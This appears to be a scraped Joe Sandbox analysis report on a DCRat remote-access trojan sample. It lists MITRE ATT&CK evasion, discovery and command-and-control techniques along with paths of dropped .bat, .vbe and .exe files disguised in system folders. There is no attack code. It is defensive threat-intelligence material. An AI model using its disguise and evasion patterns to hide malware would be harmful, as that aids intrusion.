Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Qsi7IgkrWa.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\HypercontainerServerhostDll\22eafd247d37c3

C:\HypercontainerServerhostDll\7695831dfd402e

C:\HypercontainerServerhostDll\Co5kty8OPng0Nyp4HYDkYO7HsD34XQHH4YSTo2iz4L3YIjbR4.bat

C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe

C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe

C:\HypercontainerServerhostDll\TextInputHost.exe

C:\Program Files (x86)\Windows Media Player\Network Sharing\6e82e733a89f1e

C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe

C:\Program Files\Microsoft Office 15\ClientX64\6e82e733a89f1e

C:\Program Files\Microsoft Office 15\ClientX64\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe

C:\Program Files\Windows Portable Devices\6e82e733a89f1e

C:\Program Files\Windows Portable Devices\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe

C:\Recovery\6203df4a6bafc7

Windows Analysis Report
Qsi7IgkrWa.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre